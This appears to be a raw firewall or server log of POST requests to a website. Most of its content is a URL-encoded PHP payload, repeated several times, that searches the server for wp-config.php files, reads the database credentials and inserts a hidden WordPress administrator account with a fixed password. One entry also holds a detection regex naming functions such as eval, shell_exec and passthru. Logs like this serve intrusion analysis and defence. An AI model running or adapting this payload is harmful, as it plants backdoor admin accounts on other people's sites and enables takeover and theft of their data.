RmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMzDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzkiL2fvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nfd=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:02:54","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36 Edg\/99.0.1150.30","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fX:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login